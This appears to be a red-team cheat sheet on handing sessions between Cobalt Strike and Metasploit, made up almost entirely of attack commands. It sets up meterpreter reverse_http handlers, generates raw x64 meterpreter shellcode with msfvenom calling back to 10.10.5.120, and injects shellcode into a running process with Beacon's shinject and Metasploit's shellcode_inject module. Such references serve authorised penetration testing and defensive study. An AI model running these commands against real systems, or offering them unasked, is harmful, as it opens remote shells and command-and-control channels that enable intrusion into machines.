Session Passing
Cobalt -> Metasploit
32bit payloads
root@kali:~# msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST eth0
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > exploit -j# Create Foreign HTTP Listener (10.10.5.120:8080)
# Only x86 shells
beacon> spawn foreign_listener64bit payloads
root@kali:~# msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_http
msf6 exploit(multi/handler) > set LHOST eth0
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > exploit -jroot@kali:~# msfvenom -p windows/x64/meterpreter_reverse_http LHOST=10.10.5.120 LPORT=8080 -f raw -o /tmp/msf.bin
beacon> execute C:\Windows\System32\notepad.exe
beacon> shinject 1492 x64 C:\Payloads\msf.binMetasploit -> Cobalt
# Generate x64 Raw Payload From Cobalt
msf6 > use post/windows/manage/shellcode_inject
msf6 post(windows/manage/shellcode_inject) > set SESSION 1
msf6 post(windows/manage/shellcode_inject) > set SHELLCODE /tmp/beacon.bin
msf6 post(windows/manage/shellcode_inject) > runLast updated